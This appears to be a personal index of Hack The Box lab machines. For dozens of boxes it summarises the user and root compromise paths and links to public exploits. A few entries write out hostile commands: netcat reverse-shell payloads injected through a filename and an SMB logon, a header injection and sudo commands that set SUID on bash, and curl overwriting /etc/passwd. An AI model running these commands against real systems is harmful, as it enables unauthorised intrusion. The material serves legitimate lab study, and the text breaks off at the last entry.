HACK THE BOX HISTORY

Paper

By : secnigma

Linux – 10.10.11.143 – Easy

Linux paper 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 8 – Fedora

Active services:

User Own:

• Virtual Hosting.
• WordPress 5.2.3 – (CVE-2019-17617) -(https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2) – Unauthenticated View Private/Draft Posts.
• Rocket.chat service – Hubot Assistant – Directory Path Traversal – Getting Hubot password from .env file – Access as “dwight” user.

System Own:

• System enumeration using Linpeas – (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
• Sudo version 1.8.29 – (CVE-2021-3560) -(https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation)

GoodGames

By : TheCyberGeek

Linux – 10.10.11.130 – Easy

Debian 4.19.0-18-amd64 Debian 4.19.208-1 x86_64 GNU/Linux

Debian 11 – Bullseye

Active services:

User Own:

• Login bypassing with SQL Injection (SQLi) and Database Enumeration.
• Raw-MD5 Password hash.
• Flask Dashboard v2.0.2 – Server Side Template Injection (SSTI – jinja2).

System Own:

• Docker.
• Port Discovery.
• Leaked Information and password reused.
• Shh internal connection.
• Home user directory mounted in Docker.
• User Pivoting.

SteamCloud

By : felamos

Linux – 10.10.11.133 – Easy

Debian 4.19.0-18-amd64 Linux x86_64

Debian – Sid

Active services:

User Own:

• Kubernetes API enumeration – Pods enumeration – Kubeletctl (https://github.com/cyberark/kubeletctl) – Node with pod vulnerable to RCE – Remote Command Execution (RCE) in POD with kubeletctl – Access to a Docker Container.

System Own:

• Gets Kubernetes Tokens – ca.crt,namespace,token (https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/kubernetes-enumeration) – Cluster Authentication used certificate authority and token.
• Creating an evil YAML file for a personal new POD – Get access to root system into a mount.

NodeBlog

By : ippsec

Linux – 10.10.11.139 – Easy

Active services:

User Own:

• NoSQLi – Authentication Bypass whit $ne.
• Local File Inclusion (LFI) with External Xml External Entity (XXE).
• NodeJS Deserialization Attack https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
• Immediately invoked function expression IIFE.

System Own:

• MongoDB active on port 27017.
• Mongodump enumeration – User credentials
• Sudoers user privilege – (ALL : ALL) ALL

Pandora

By : TheCyberGeek & dmw0ng

Linux – 10.10.11.136 – Easy

Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• SNMP Enumeration – Clear text credentials for user “Daniel“

System Own:

• Local Port Forwarding – Pandora Console v7.ONG.742_FIX_PERL2020 – Unauthenticated SQLi

Backdoor

By : hkabubaker17

Linux – 10.10.11.125 – Easy

Ubuntu Linux 5.4.0-80-generic x86_64

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• Virtual Hosting.
• Directory Listing on /wp-content/plugins.
• Ebook download Plugin – Directory Traversal – Local File Inclusion (LFI) https://www.exploit-db.com/exploits/39575
• Gdbserver enumeration on port 1337.
• Gdbserver – Remote Command Execution (RCE) https://www.exploit-db.com/exploits/50539

System Own:

• Screen SUID – Screen session activated by root – synchronization with param -X.

Nunchucks

By : TheCyberGeek

Linux – 10.10.11.122 – Easy

Linux 5.4.0-86-generic x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• Virtual hosting
• Subdomain enumeration.
• Node.js – Nunjucks – Server Site Template Injection (SSTI – jinja2) https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#nunjucks
• “range.constructor” – Local File Inclusion (LFI) / Remote Command Execution (RCE)

System Own:

• Capabilites – /usr/bin/perl – cap_setuid+ep. https://gtfobins.github.io/gtfobins/perl/#capabilities
• Bypassing AppArmor Perl using shebang #!/usr/bin/perl https://bugs.launchpad.net/apparmor/+bug/1911431

Secret

By : z9fr

Linux – 10.10.11.120 – Easy

Linux 5.4.0-89-generic x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• DUMB API.
• Json Web Token (JWT).
• Directory Fuzzing.
• Source Code analysis – Git Project.
• Remote Command Execution (RCE) – Exec Function.

System Own:

• Executable with SUID permission.
• C programming.
• Function prctl(PR_SET_DUMPABLE, 1) available – Abusing Core Dump – Killing BUS program.
• Generate crash file in /var/crash.
• Read crash file with apport-unpack to read privileged files.

Antique

By : MrR3boot

Linux – 10.10.11.107 – Easy

Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• SNMP Enumeration – snmpwalk – Get hexadecimal code from BIT param.
• Decoded Hexadecimal – Obtain a password – Access to telnet service – Exec function enabled.

System Own:

• Port enumeration – open 631 port – CUPS 1.6.1 – Root File Read (RFR) with Cupstl CVE-2012-5519(https://github.com/0zvxr/CVE-2012-5519).

Validation

By : ippsec

Linux – 10.10.11.107 – Easy

Linux validation 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 GNU/Linux

Debian GNU/Linux 11 – Bullseye

Active services:

User Own:

• Web client programmed in PHP 7.4.23.
• SQL Injection (SQLi) – Remote Command Execution (RCE) using INTO OUTFILE (https://dev.mysql.com/doc/refman/5.6/en/select-into.html) – Access as “www-data” user.

System Own:

• PHP File with root credentials.

Horizontall

By : wail99

Linux – 10.10.11.105 – Easy

Linux horizontall 4.15.0-154-generic #161-Ubuntu SMP Fri Jul 30 13:04:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.5 LTS – Bionic

Active services:

User Own:

• Virtual hosting.
• Directory Fuzzing – Find subdomain with an API.
• Strapi 3.0.0-beta.17.4 (Open source Node.js CMS) – Remote Command Execution (RCE) – (https://www.exploit-db.com/exploits/50239) – Access as “strapi” user.

System Own:

• Laravel v8 (PHP v7.4.18) enabled on port 8000 – Remote Command Execution (RCE) – (https://github.com/ambionics/laravel-exploits) Monolog/RCE – Access as “root” user.

Spectra

By : egre55

Others – 10.10.10.229 – Easy

Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7302P 16-Core Processor AuthenticAMD GNU/Linux

ChromeOS

Active services:

User Own:

• Virtual Hosting.
• WordPress 5.4.2 / PHP 5.6.40.
• WordPress configurations files (wp.config)- Directory Listing – Access to wordpress administrator – Remote Command Execution (RCE) into a php template file – Access as “nginx” user.
• System enumeration – File with credentials into an etc folder – access as “katie” user.

System Own:

• Sudoers user privilege – (ALL) SETENV: NOPASSWD: /sbin/initctl – modification a service configuration file to execute a commands as root.

Admirer

By : polarbearer & GibParadox

Linux – 10.10.10.187 – Easy

Linux admirer 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux

Devuan GNU/Linux 2.1 – ascii

Active services:

User Own:

• Robots.txt disallowed directory – File Fuzzing – Find a credentials file – Access to ftp server – File server configuration.
• Adminer Database 4.6.2 – Creating an own database to exploit vulnerability -(https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool) – Local File Inclusion (LFI) using “LOAD DATA LOCAL” – Obtain user “waldo” credentials to ssh connect – Access as user “waldo“.

System Own:

• Sudoers user privilege – (ALL) SETENV: /opt/scripts/admin_tasks.sh – Set enviroment variables capacity.
• Python Library Hijacking – shutil.py.
• Modify user python path and execute the script – sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh

Traceback

By : Xh4H

Linux – 10.10.10.181 – Easy

Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

User Own:

• Page source analysis – PHP Shell backdoor – Remote Command Execution (RCE) – (https://github.com/TheBinitGhimire/Web-Shells) – Access as “webadmin” user.
• Sudoers user privilege – (sysadmin) NOPASSWD: /home/sysadmin/luvit – User “webadmin” can run a Lua binary as user “sysadmin” – Executing os.execute(‘/bin/bash’) into Lua interface – Pivoting – Access as “sysadmin” user.

System Own:

• File MOTD into etc folder which owner is “root” and group owner is “sysdamin” – This MOTD has an header file that execute an “echo” when an user access by SSH – Add an authorized-key to .ssh “sysadmin” user path – Modification of the header file to introduce a Rever shell – Access as “root” user.

OpenAdmin

By : del_KZx497Ju

Linux – 10.10.10.171 – Easy

Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

User Own:

• Directory fuzzing.
• OpenNetAdmin – v18.1.1 – Remote Command Execution (RCE) – (https://github.com/amriunix/ona-rce) – Access as “www-data” user.
• Mysql crendentials into a database config php file – password for “jimmy” user.
• Site available on port 52846 – assignUserID to user “joanna” – Creating an evil php file to execute commands as “joanna” user – Getting an encrypted id_rsa of joanna – ssh2john – Access as “joanna” user.

System Own:

• Sudoers user privilege – (ALL) NOPASSWD: /bin/nano /opt/priv – (https://gtfobins.github.io/gtfobins/nano/#sudo)

Traverxec

By : jkr

Linux – 10.10.10.165 – Easy

Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

Debian GNU/Linux 10 – buster

Active services:

User Own:

• Nostromo 1.9.6 Exploit – Remote Command Execution (RCE) – (https://www.exploit-db.com/exploits/47837) – Access as “www-data” user.
• User crendentials into .htpasswd file – Password cracking – Access to homedir_public (https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=NHTTPD#HOMEDIRS) – File backup into a protected file area.
• Ssh users keys into backup file – Cracking ssh encrypted id_rsa ssh2john – Access as user “david” into ssh.

System Own:

• Shell script into user home that execute “/usr/bin/journalctl” with sudo – (https://gtfobins.github.io/gtfobins/journalctl/#sudo) – Journalctl Exploitation.

Postman

By : TheCyberGeek

Linux – 10.10.10.160 – Easy

Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

User Own:

• Redis Exploitation – Insert SSH key with redis-cli (https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis#ssh) – Access as “redis” user.
• Encrypted user id_rsa into /opt/ folder – ssh2John – Cracking id_rsa encrypted – Access as “Matt” user.

System Own:

• Webmin 1.910 – Reusing Credentials – Webmin Exploit – Remote Command Execution (RCE) – (https://github.com/roughiz/Webmin-1.910-Exploit-Script) – Access as “root” user.

Networked

By : guly

Linux – 10.10.10.146 – Easy

Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 7- rhel fedora

Active services:

User Own:

• Information leaked – Directory Fuzzing.
• PHP code downloadable – Code analysis.
• Image file upload capability.
• Upload an evil php file into an image file – Remote Command Execution (RCE) – access as user “apache“.
• PHP script executed by user “guly” periodically (/home/guly/) – Use of function exec() to execute rm command – Adding command into filename with: touch ‘; nc -c bash IP PORT’ – Access as user “guly“.

System Own:

• Sudoers user privilege NOPASSWD: /usr/local/sbin/changename.sh.
• Root through network-scripts – (https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f ).

Safe

By :gh0stm5n

Linux – 10.10.10.147 – Easy

Linux safe 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12) x86_64 GNU/Linux

Debian Linux 9 – stretch

Active services:

User Own:

• Web enumeration – Information Leakage
• Script running in port 1337 – 64-bit Executable binary downloadable – Reverse engineering – Code analysis – Buffer Overflow (BOF) [Remote]:
  • Use function system(“/usr/bin/uptime”)
  • NX Enabled.
  • ROP attack.

System Own:

• Keepass password database in user home “MyPasswords.kdbx“.
• JPG images in user home, posible keyfiles to keepass.
• Keppass Brute Force – Keepass2john -k keyFileImage .kdbx. – Keepass Password.
• Root password into keepaas database.

Haystack

By : JoyDragon

Linux – 10.10.10.115 – Easy

Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 7 – rhel fedora

Active services:

User Own:

• Information hidden in the printable strings of an image – Base64
• ElasticSearch Enumeration (https://book.hacktricks.xyz/network-services-pentesting/9200-pentesting-elasticsearch) – Local File Read (LFR) – Find user:pass into an index param.
• Access as user “security” by SHH.
• System enumeration – Open internal port 5601 – Kibana app running (v6.4.2).
• SSH Local Port Forwarding.
• Kibana Local File Inclusion (LFI) < 6.4.3 & 5.6.13 (CVE-2018-17246) – (https://github.com/mpgn/CVE-2018-17246#cve-2018-17246—kibana-lfi–643–5613) – Access as user “kibana“. [User Pivoting].

System Own:

• Logstash. Files Input.conf -> Filter.conf -> Output.conf on /etc/logstash/conf.d – Execute by “root” every 10 seconds a command locate in /opt/kibana/ with name logstash_*.

Writeup

By : jkr

Linux – 10.10.10.138 – Easy

Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux

Devuan GNU/Linux 2.1 – ascii

Active services:

User Own:

• Disallowed directory in Robots.txt
• CMS Made simple 2004-2019 – (CVE – 2019-9053) – Unatheticated SQL Injection – (https://www.exploit-db.com/exploits/46635) – MD5 Password Hash – Login as user “jkr” by SHH.

System Own:

• System process enumeration (PSPY) – (https://github.com/DominicBreuker/pspy)
• Shell script executed by root into MOTD – Using “uname” from relative path – The script is executed as a welcome when a user successfully logs in via SSH.
• User “jkr” in “staff” group – Can write to “/usr/local“.
• Path Hijacking – cp an evil uname to /usr/local/bin.

SwagShop

By : ch4p

Linux – 10.10.10.140 – Easy

Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 16.04.6 LTS – xenial

Active services:

User Own:

• Virtual Hosting.
• Magento eCommerce v1.9.0 – Remote Code Execution (RCE) – Creating an admin user – (CVE : 2015-1397) – (https://www.exploit-db.com/exploits/37977).
• Magento froghopper attack – (https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper) – Access as “www-data“.

System Own:

• User “www-data” in sudo group. Sudoers user privilege NOPASSWD: /usr/bin/vi /var/www/html/*
• Create a variable Shell=/bin/bash into vi and executed it.

FriendZone

By : askar

Linux – 10.10.10.123 – Easy

Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.1 LTS – bionic

Active services:

User Own:

• Virtual Hosting.
• DNS zone transfer attack (AXFR). Subdomain Enumeration.
• SMB Enumeration. Disk with READ,WRITE permissions into path /etc/Development.
• Directory Path Traversal Into a PHP script – Remote Command Execution (RCE) – access as “www-data” user.
• Credentials into a “.conf” file – access as “friend” user.

System Own:

• System process enumeration.
• Python script executed by root periodically (/opt/server_admin/reporter.py).
• Python Library Hijacking – OS Library – Permissions 777 to /usr/lib/python2.7/os.py

Help

By : cymtrick

Linux – 10.10.10.153 – Easy

Linux 4.4.0-116-generic #140-Ubuntu x86_64 GNU/Linux

Ubuntu 16.04.5 LTS – xenial

Active services:

User Own:

• Virtual Hosting.
• Directory Fuzzing.
• HelpDeskZ 1.0.2 – A free helpdesk software (https://github.com/evolutionscript/HelpDeskZ-1.0).
• Express Framework (Express.js).
• GraphQL Queries:
  • /graphql?query={user{username, password}}
• MD5 Password Hash.
• Authentication SQL Injection (SQLi) Error Based – (https://www.exploit-db.com/exploits/41200).
• [Alternative] – Arbitrary File Upload – Remote Command Execution (RCE) (https://www.exploit-db.com/exploits/40300).

System Own:

• Kernel Exploitation – Local Privilege Escalation – (https://www.exploit-db.com/exploits/44298).

Teacher

By :Gioo

Linux – 10.10.10.153 – Easy

Linux 4.9.0-8-amd64 Debian 4.9.110-3+deb9u6 x86_64 GNU/Linux

Debian GNU/Linux 9.5 – stretch

Active services:

User Own:

• Virtual Hosting.
• Source code analysis – HTML.
• Information leaked inside alleged image.
• Directory Fuzzing.
• Moodle.
• Brute force (password).
• Mysql – MariaDB (10.1.26-MariaDB-0+deb9u1) – Database inspection – MD5 Pass.

System Own:

• System enumeration.
• Bash script executed by root periodically (/usr/bin/backup.sh)
• Backup of user home folder with Chmod 777 -R.
• Symbolic link from root directory.

Irked

By : MrAgent

Linux – 10.10.10.117 – Easy

Linux 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

Debian 8.10 – jessie

Active services:

User Own:

• UnrealIRCD 3.2 Backdoor – https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.
• Hidden file with password.
• Steganography – Hidden text file in an image – Steghide

System Own:

• SUID script.

Curling

By : L4mpje

Linux – 10.10.10.150 – Easy

Active services:

User Own:

• Information Leaked.
• Base64-encoded password.
• Creating an evil PHP file into template – Remote Command Execution (RCE).
• User Password file within TarFile within Bzip2 within p7zip within Gzip within bzip2 within Hexadecimal-encoded file.

System Own:

• Modification of /etc/passwd with Curl with the use of the “output” parameter in script located in the user’s admin-area folder executed by the root user periodically. (Pivoting)

Frolic

By : Felamos

Linux – 10.10.10.111 – Easy

Ubuntu 4.4.0-116-generic i686 athlon i686 GNU/Linux

Active services:

User Own:

• Source code leaks.
• Ook! – Esoteric programming language.
• Brute force in zip file.
• Base64 and Hexadecimal decode.
• BrainFuck – Esoteric programming language.
• phpinfo() – Information Leakage.
• PlaySMS 1.4 – Remote Code Execution (RCE) (CVE-2017-9101) – (https://www.exploit-db.com/exploits/42044).

System Own:

• SUID binary.
• Buffer Overflow:
  • NX Enabled
  • ASLR Disabled

Blocky

By : Arrexel

Linux – 10.10.10.37 – Easy

Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 16.04.2 LTS – xenial

Active services:

User Own:

• User enumeration in post author (notch).
• Directory Fuzzing.
• Credentials into a “.class” file within in a “.jar” file.
• Reused credentials for the “notch” user via SSH.
• [Alternative] Reused credentials for the phpMyAdmin “root” user and.
  • Change password user notch to access wordpress administration panel.
  • Remote Command Execution (RCE) into php template file – access as “www-data” user.

System Own:

• User “notch” in sudo group. Sudoers User privilege (ALL : ALL) ALL.
• [Alternative] User “notch” into LXD group – LXD Privilege Escalation (https://www.exploit-db.com/exploits/46978).

Bank

By : makelarisjr

Linux – 10.10.10.29 – Easy

Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux

Ubuntu 14.04.5 LTS – trusty

Active services:

User Own:

• Virtual Hosting.
• Directory Fuzzing.
• Directory Listing.
• Credentials into a”.acc” file extension.
• Upload an evil php file (PHP 5.5.9) – Remote Command Execution (RCE). **[DEBUG] I added the file extension .htb to execute as php for debugging purposes only**.

System Own:

• SUID File (/var/htb/emergency) allows you to run a shell as root user.
• [Alternative] File /etc/passwd with write permission for other users.

Beep

By : ch4p

Linux – 10.10.10.7 – Easy

Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux

Active services:

User Own:

*IMPORTANT * To access the web resources it is necessary to activate TLS 1.0 in Firefox https://support.mozilla.org/en-US/questions/1101896

• Elastix – Local File Inclusion (LFI) (https://www.exploit-db.com/exploits/37637).
• Credentials in plain text into /etc/amportal.conf.
• VTiger GRM 5 – Upload an evil php file – Remote Command Execution (RCE) – System access as “asterisk” user.
• [Alternative] Webmin – Shell shock attack – System access as “root” user.
• [Alternative] Password reuse for SSH access as root user.

System Own:

• [asterisk] – Sudoers multiple privileges as root user:
  • NOPASSWD: /sbin/shutdown
  • NOPASSWD: /usr/bin/nmap -> https://gtfobins.github.io/gtfobins/nmap/#sudo
  • NOPASSWD: /usr/bin/yum
  • NOPASSWD: /bin/touch
  • NOPASSWD: /bin/chmod -> sudo chmod u+s /bin/bash; bash -p
  • NOPASSWD: /bin/chown -> https://gtfobins.github.io/gtfobins/chown/#sudo
  • NOPASSWD: /sbin/service -> sudo service ../../../bin/bash
  • NOPASSWD: /sbin/init
  • NOPASSWD: /usr/sbin/postmap
  • NOPASSWD: /usr/sbin/postfix
  • NOPASSWD: /usr/sbin/saslpasswd2
  • NOPASSWD: /usr/sbin/hardware_detector
  • NOPASSWD: /sbin/chkconfig
  • NOPASSWD: /usr/sbin/elastix-helper

Lame

By : ch4p

Linux – 10.10.10. 3 – Easy

Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Ubuntu 8.04 – hardy

Active services:

User Own / System Own:

• Smbclient – protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED:
  • –option=”client min protocol=NT1″
• Remote Command Execution (RCE):
  • Use username /=`nohup + command into SMB login:

-c 'logon "/=`nohup nc -e /bin/bash IP PORT`"'

smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1" -c 'logon "/='nohup nc -e /bin/bash IP PORT'"'

• [Alternative] SMBD Exploit – CVE-2007-2447 – (https://github.com/amriunix/CVE-2007-2447).

BackendTwo

By : ippsec

Linux – 10.10.11.162 – Medium

Linux BackendTwo 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

User Own:

• Directory Fuzzing.
• Uvicorn API – JSON data – User Enumeration.
• Json Web Token (JWT).
• FastAPI 0.1.0 OAS3 Docs – Mass assignment attack (MAA).
• Local File Read with API.
• System process enumeration- Find uvicorn process PID.
• Get JWT Secret token from api config files – Modifying user JWT.
• Abusing API functions – Download API code files – Upload moficated .py files with a rever shell – Access as “htb” user.

System Own:

• Find user htb password into aut.log.
• PAM-Wordle configured – A mini game about guessing a word to get sudoers permissions – Pam files found into pam.d/sudo – List of words found into a file into binary strings – Find word “ipsec“.
• Sudoers user privilege (ALL : ALL) ALL

Backend

By : ippsec

Linux – 10.10.11.161 – Medium

Linux Backend 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

User Own:

• Directory Fuzzing.
• Uvicorn API – JSON data – User Enumeration.
• Json Web Token (JWT).
• FastAPI 0.1.0 OAS3 Docs – Modification user admin password with an API function.
• Get JWT Secret Token from API configuration files – Modification JWT of user Admin to add field debug.
• Executing Commands with API function – Rever Shell – Acces as “htb” user.

System Own:

• Root password into auth.log.

Ransom

By : ippsec

Linux – 10.10.11.153 – Medium

Linux ransom 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

User Own:

• Laravel Login Bypass – Type Juggling.
• Encrypted zip file – ZipCrypto Deflate.
• Using bkcrack (https://github.com/kimci86/bkcrack) to decrypt zip using plaintext file equal to a cipher file – (https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8).
• Obtaining user name «htb» from id_rsa.pub – Access using id_rsa.

System Own:

• Hard-coded root password into the web login access php code.

Epsilon

By : MrR3boot

Linux – 10.10.11.134 – Medium

Linux epsilon 5.4.0-97-generic #110-Ubuntu SMP Thu Jan 13 18:22:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• Directory fuzzing.
• /.git/ folder – Using GitHack to download the repository (https://github.com/OwenChia/githack).
• Obtain AWS access keys from Git commit – Get a secret key from lamdba functions with aws tool.
• Creating a JWT to “admin” user with the Secret found
• Bypass login panel using the JWT as an auth session cookie.
• Server Side Template Injection (SSTi – jinja2) – Remote Command Execution (RCE) – access as “tom” user.

System Own:

• System enumeration with PSPY.
• Cron – Bash script executed by root periodically – /usr/bin/backup.sh – Using TAR command with “-h” param to follow symlinks.
• Create and evil script to steal user root id_rsa with a symlink.

Flustered

By : polarbearer

Linux – 10.10.11.131 – Medium

Linux flustered 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux

Debian GNU/Linux 10 – buster

Active services:

User Own:

• GlusterFS Enumeration – Mounting Volume1 into local file system – Mysql /var/lib files – MariaDB 10.3.31 – Getting squid proxy user&password.
• Access to Squid Proxy using curl –proxy.
• Directory Proxy Fuzzing.
• Leaked app python code – Flask Server Side Template Injection (SSTi – jinja2) – Remote Command Execution (RCE) – Access as “www-data” user.
• Obtaining clusterfs certs to mount Volume2 into local file system – Modification authorized key from ssh – Access as “jennifer” user into a docker container.

System Own

• Port Discovery – Open port 10000 – SSH Local Port Forwarding – Microsoft Azure Storage – Get Azure Key from a backup – Connect to Azure Storage with a Local Storage Emulator – Get root id_rsa.

Timing

By: irogir

Linux – 10.10.11.135 – Medium

Linux timing 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.6 LTS – Bionic

Active services:

User Own:

• Fuzzing php files.
• Local File Inclusion (LFI) – PHP wrappers Base64 (php://filter/convert.base64-encode/resource=file)- (https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#base64-1) – Downloading PHP web source code.
• PHP code analysis.
• Compute filename as a function of time.
• Uploaded php code into a jpg image – Remote command Execution (RCE).
• Getting a zip file with a git project from web server – Get db credentials from a commit.
• Reusing password for access to SSH as “aaron” user.

System Own:

• Sudoers user privilege – (ALL) NOPASSWD: /usr/bin/netutils – creating symbolics links to modify files with root privileges.

Union

By: ippsec

Linux – 10.10.11.128 – Medium

Linux union 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• PHP files fuzzing.
• SQL injection (SQLi) Error Based using UNION operator:
  • Enumerate Data Base to find a flag which enable ssh IP access.
  • Using load_file for read a php config file to get database credentials for “uhc” user.
• Reusing password for access to SSH as “uhc” user.

System Own:

• PHP file Firewall.php analysis.
• Abusing header X-FORWARDER-FOR to executing commands as “www-data” user – Remote command execution (RCE).
• Sudoers www-data privilege – (ALL : ALL) NOPASSWD: ALL
• (X-FORWARDED-FOR: 1.1.1.1; sudo chmod u+s /bin/bash;)

Unicode

By: webspl01t3r

Linux – 10.10.11.126 – Medium

Linux code 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

User Own:

• Open Redirect into the website.
• Generating a JSON Web Key (JWK) (https://mkjwk.org/) to create a modified JWT for admin user – Abusing Open redirect to load the local JWK – Access to admin dashboard.
• Local File Inclusion (LFI) into url – Bypassing Path Traversal filtering using Unicode characters (Unicode Normalization Vulnerability) – (https://book.hacktricks.xyz/pentesting-web/unicode-normalization-vulnerability#vulnerable-examples) – Get user credentials from db.yml file – Access as user “code” by ssh.

System Own:

• Sudoers user privilege – (root) NOPASSWD: /usr/bin/treport
• Decompile treport binary using pyinstxtractor (https://github.com/LucifielHack/pyinstxtractor) and pycdc (https://github.com/zrax/pycdc).
• Abussing -o curl param to modify the passwd file – {IP/passwd,-o,/etc/passwd}
• [Alternative] add your id_rsa.pub to root authorized_key – {IP/id_rsa.pub,-o,/root/.ssh/authorized_key}

Shibboleth

By: knightmare & mrb3n

Linux – 10.10.11.124 – Medium

Linux shibboleth 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.1 LTS – Focal

Active services:

User Own:

• Virtual Hosting.
• Subdomain and directory fuzzing.
• IPMI 2.0 – Cracking “Administrator” password (https://github.com/c0rnf13ld/ipmiPwner)
• Zabbix 5.0.17 – Remote code execution (RCE) (Authenticated) – Creating a “system.run” key item to executing commands.
• Password reuse to user “ipmi-svc“.

System Own:

• Database credentials into zabbix_server.conf file.
• MariaDB 10.3.25 (CVE-2021-27928) -(https://github.com/Al1ex/CVE-2021-27928) – Access as “root” user.

Devzat

By: c1sc0

Linux – 10.10.11.118 – Medium

Linux devzat 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.2 LTS – Focal

Active services:

User Own:

• Virtual Hosting.
• Subdomain Fuzzing.
• .git directory – Go code analysis – Remote Command Execution (RCE) modifying the json post data to inject system commands – Access as “patrick” user.
• System enumeration – InfluxDB running on port 8086 – Authentication Bypass (CVE-2019-20933) – (https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) – Obtaining user credentials – User pivoting to “catherine“.

System Own:

• System enumeration – Chat over SSH beta running on port 8443.
• Chat Backup file – Harcode password.
• SSH chat abussing command /file and path traversal to read systems file as root user – get root id_rsa.

Bolt

By: d4rkpayl0ad & TheCyberGeek

Linux – 10.10.11.114 – Medium

Linux bolt.htb 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.03 LTS – Focal

Active services:

User Own:

• Virtual Hosting.
